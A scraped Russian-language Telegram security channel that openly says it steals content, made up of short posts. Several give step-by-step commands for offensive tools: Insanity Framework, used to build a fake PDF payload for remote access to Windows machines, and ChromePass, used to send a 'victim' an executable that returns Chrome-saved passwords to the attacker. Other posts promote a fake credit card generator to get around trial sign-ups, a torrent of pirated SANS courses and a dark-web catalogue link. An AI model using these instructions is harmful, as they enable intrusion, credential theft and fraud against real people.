C.I.T. Security – Telegram
C.I.T. Security
8.14K subscribers
2.83K photos
254 videos
4.19K files
4.1K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://news.1rj.ru/str/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Как взломать игру-динозаврика в Google Chrome

Игра в динозаврика в Chrome автоматически появляется при отключении интернета. Но её можно вызвать специально, набрав в адресной строке «chrome://dino».

Игра заканчивается после 17 миллионов лет игрового времени. То есть относительно того, как долго тираннозавр существовал до того, как вымер. А ещё мы узнали, что можно Dino сделать бессмертным до конца игры.

Делаем динозаврика неуязвимым:
🟢Жмём правую кнопку мыши на странице и выбираем пункт «Просмотреть код», либо жмём F12
🟢Переходим во вкладку «Консоль»
🟢Вводим команду «Runner.instance_.gameOver = function(){};»
🟢Жмём Enter
После этого динозаврик будет спокойно пробегать сквозь все препятствия, но очки по-прежнему будут набираться.
👍1
👁 Взламываем ПК через PDF файл

• Формат PDF имеет множество уязвимостей, благодаря которым в файлы можно "вшивать" вирусы и т.п.  В данном посте представлен автоматизированный фреймворк Insanity Framework для создания зараженного PDF-файла, который позволит реализовать удаленный доступ к машинам на Windows.

Установка:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod +x insanity.py
$ ./install.sh

Использование:
$ sudo python2 insanity.py

• При первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт.
🔎 5 инструментов для GEOINT расследований:

1. EarthCam — агрегатор рабочих веб-камер по всему миру;
2. Geoestimation — оценивает местоположение фотографии с помощью ИИ;
3. Airportwebcams — агрегатор веб-камер в различных аэропортах мира;
4. Peakvisor — cодержит данные о более 1.000.000 гор по всему миру, часто используется в расследованиях для опознавания локации по очертанию рельефа на заднем плане;
5. F4Map — карта мира с 3D-зданиями и тенями от них в различное время суток.
1
F-16A-B-T-O-1F-16A-1Flight-Manual (5).pdf
35.3 MB
Коллеги. Вдруг кто то с оказией окажется на аэродроме где будут F16.  Что бы не уходить с пустыми руками можно улететь. Инструкция на первый полет на F16. Прошу прощения что английский.
👏1😁1
D1T1_The_Secret_Codes_Tell_the_Secrets_Zhang_Qing_&_BaiGuang_Dong.pdf
41.6 MB
#redteam #mobile #pohek

Рассматривается очень интересная тема сервисных кодов для мобильных телефонов, которыми можно управлять телефоном (те самые наборы цифр и символов).
Как захватить пароли из аккаунта в Google?

Большинство пользователей хранит свои пароли прямо в браузере, в так называемых "формах автозаполнения" Chrome.

ChromePass - это специализированная утилита, написанная на языке программирования Python, способная "добывать" сохраненные пароли в Chrome.

Установка:
$ git clone
https://github.com/bierschi/chromepass
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt

Использование:
$ python create_server.py

После запуска, выбираем метод - client.exe, вводите свой IP. Если хотите, то включите сообщение об ошибке, и добавьте сообщение. Файл server-ip.exe - должна получить ваша жертва. В файле client.txt появятся пароли.
📁 Удобный инструмент "удалить" себя с интернета

Just Delete Me — помогает удалить аккаунт на том или ином сервисе. Просто выберите нужный вам сервис или сайт.

JustDelete перенаправит
вас прямо на страницу удаления аккаунта.

Все сервисы распределены по цвету: сервисы с зелёным цветом удаляются просто, с жёлтым — средне, с красным — тяжело, а сервисы помеченные чёрным удалить практически
невозможно
💳Делаем фейковые реквизиты карт

Для тех, кто хочет оставаться в тени: некоторые сервисы и приложения просят данные карты, чтобы оценить пробную версию, но мы знаем, что данные карт часто сливают в сеть.

Чтобы этого избежать - воспользуйтесь сервисом "Credit Card
Generation".

Он создаёт фейковую карту, данные которой вы можете использовать для сервисов и приложений.
Как пользоваться сервисом:
Переходим на этот сайт - CardGenerator
Выбираем платёжную систему из списка: VISA, MasterCard, Maestro и другие.
Нажимаем на кнопку "Generate Card", копируем данные карты и вставляем в сервис.
#SANS 156GB Courses Torrent

magnet:?xt=urn:btih:aeb4bb75f2c4dd7d1959041b09115ef8068e6f36&dn=sans&tr=http%3a%2f%2fbt.t-ru.org%2fann%3fmagnet

#infosec
👍1
D1T1_The_Secret_Codes_Tell_the_Secrets_Zhang_Qing_&_BaiGuang_Dong.pdf
41.6 MB
#redteam #mobile #pohek

Рассматривается очень интересная тема сервисных кодов для мобильных телефонов, которыми можно управлять телефоном (те самые наборы цифр и символов).
🧦Nmap

Единственным недостатком такого надежного и мощного инструмента, как Nmap, является запоминание большого количества команд. Даже многие опытные профессионалы отрасли не могут максимально эффективно использовать Nmap просто потому, что отслеживание всех его флагов может оказаться сложной задачей.

👉Шпаргалка по Nmap 2024: все команды и флаги

P.S ребята, мощнейший ресурс для вас ссылка прилагается сверху, пользуйтесь

#полезное

Белый хакер
🖥 Репозиторий: jsteg — сокрытие информации

jsteg - пакет GO для сокрытия данных внутри файлов jpeg c помощью стеганографии. Каждый бит скрытых данных копируется в наименее значимые биты изображения.

— Объем данных, которые можно скрыть, зависит от размера файла jpeg.
В пакет также входит команда slink для встраивания открытого ключа в файл JPEG и подписи данных с использованием пар ключей, полученных из строк паролей.

Ссылка на GitHub

#Steganography #Forensics
🖥 Репозиторий: Certmaster — автоматизация SSL сертификации

Certmaster автоматизирует процесс обновления и установки сертификатов SSL.

Каковы его возможности:
— Он создает сертификат SSL из Let's Encrypt.
— Он проверяет сертификаты с помощью DNS.
— Он может загружать или устанавливать сертификаты SSL в несколько мест назначения, включая электронную почту, SFTP и Hetzner Load Balancer.

Ссылка на GitHub

#SSL #DNS
👍1
Deep Web Turkey
http://indexzz7n3cq4slh5bh2lcctmiwk2y7epxjvkpyaemtuat2alprveyid.onion
Category: Catalogue

///////////
The Deep Web Turkey website serves as a specialized portal offering access and insights into the Turkish segment of the
\\\\\\\\\\\